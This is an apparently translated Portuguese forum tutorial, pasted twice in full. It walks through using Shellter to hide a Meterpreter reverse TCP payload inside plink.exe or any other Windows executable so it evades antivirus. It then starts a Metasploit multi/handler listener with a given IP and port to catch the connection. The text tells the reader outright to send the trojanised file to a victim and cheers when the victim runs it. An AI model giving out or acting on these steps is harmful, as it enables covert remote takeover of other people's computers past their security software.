P.S: Foi utilizada o Kali Linux no tutorial.
Faça o download do Shellter:
Copie o arquivo "plink.exe" localizado em "/usr/share/windows-binaries" para o diretório que você instalou o Shellter.
Inicie o Shellter.
Escolha "A" para o Automatic Mode.
No PE Target Prompt coloque o arquivo que você copiou, no caso, o "plink.exe", ou qualquer outro executável que você queira obfuscar.
Quando pedir o tipo de Payload, selecione "L", depois escolha o "1".
Agora, coloque o IP de seu computador. Ex: 192.168.1.39
E a porta, foi usada a 5555.
Espere um tempo, e o framework irá obfuscar o código do executável, retornando algo assim caso seja bem sucedido.
Agora precisamos colocar uma porta em escuta no Kali, segue abaixo:
• inicie o Metasploit (‘msfconsole’ no terminal)
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
• exploit
Agora você tem uma porta esperando por conexões. Envie seu executável obfuscado pelo Shellter para alguma vítima, ou teste em uma máquina virtual antes de tudo para ter certeza que está funcionando, se o firewall do roteador não está atrapalhando em nada etc. Caso tudo esteja ok, quando a vítima executar... pwnz!
Certamente não ficará 0/0 na taxa de detecção, mas se livrarás de muitos AVS!
Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Traduzido por dwango.
Faça o download do Shellter:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Inicie o Shellter.
Escolha "A" para o Automatic Mode.
No PE Target Prompt coloque o arquivo que você copiou, no caso, o "plink.exe", ou qualquer outro executável que você queira obfuscar.
Quando pedir o tipo de Payload, selecione "L", depois escolha o "1".
Agora, coloque o IP de seu computador. Ex: 192.168.1.39
E a porta, foi usada a 5555.
Espere um tempo, e o framework irá obfuscar o código do executável, retornando algo assim caso seja bem sucedido.
Agora precisamos colocar uma porta em escuta no Kali, segue abaixo:
• inicie o Metasploit (‘msfconsole’ no terminal)
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.1.39
• set lport 5555
• exploit
Agora você tem uma porta esperando por conexões. Envie seu executável obfuscado pelo Shellter para alguma vítima, ou teste em uma máquina virtual antes de tudo para ter certeza que está funcionando, se o firewall do roteador não está atrapalhando em nada etc. Caso tudo esteja ok, quando a vítima executar... pwnz!
Certamente não ficará 0/0 na taxa de detecção, mas se livrarás de muitos AVS!
Fonte: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Traduzido por dwango.
Comment